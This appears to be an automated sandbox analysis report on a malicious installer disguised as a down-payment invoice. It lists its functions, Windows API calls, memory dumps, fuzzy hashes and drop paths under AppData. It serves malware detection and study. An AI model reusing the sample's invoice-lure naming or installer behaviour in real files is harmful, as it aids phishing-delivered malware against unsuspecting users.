                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                      • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                                                                                                                      • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 6F1D121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,?,6F1D123B,?,6F1D12DF,00000019,6F1D11BE,-000000A0), ref: 6F1D1225
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                                      • Opcode ID: c46be030a737957ad009b1258bae05f1c65439d1aad3f4fd22169cc84f18da4f
                                                                                                                                                                                                                      • Instruction ID: 9ba8410464df9c67ad41a2a481150a4ac16424f3d71ff39a5bec9b26d8425606
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c46be030a737957ad009b1258bae05f1c65439d1aad3f4fd22169cc84f18da4f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25B01270A01400DFEF00DB64CC47F303274E741350F004000F601C0140C1218820CA34
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                                                                                                                        • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00405912
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                      • String ID: (7B${
                                                                                                                                                                                                                      • API String ID: 590372296-525222780
                                                                                                                                                                                                                      • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                                                                                                                                      • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404850 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                                                                                                                        • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                                                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                                        • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                                        • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                                                                                                                        • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                                        • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                                        • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                      • String ID: (7B$A$C:\Users\user\AppData\Local\Admonishment64$Call
                                                                                                                                                                                                                      • API String ID: 2624150263-3624656726
                                                                                                                                                                                                                      • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                                                                                                                      • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences, xrefs: 004021C3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences
                                                                                                                                                                                                                      • API String ID: 542301482-79196314
                                                                                                                                                                                                                      • Opcode ID: 4f2286ed38648dcc2c47485c3b8c03fd85972866aeeba554557880fa94d5da5d
                                                                                                                                                                                                                      • Instruction ID: e2e3704c815c40c35bbcee670b9089186c45407539ca1009a8039cbe375c7a13
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f2286ed38648dcc2c47485c3b8c03fd85972866aeeba554557880fa94d5da5d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB54
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                                                      • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                                                                                                                                      • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                      • String ID: Call$N
                                                                                                                                                                                                                      • API String ID: 3103080414-3438112850
                                                                                                                                                                                                                      • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                                                                                                                      • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                      • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                                                                                                                      • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
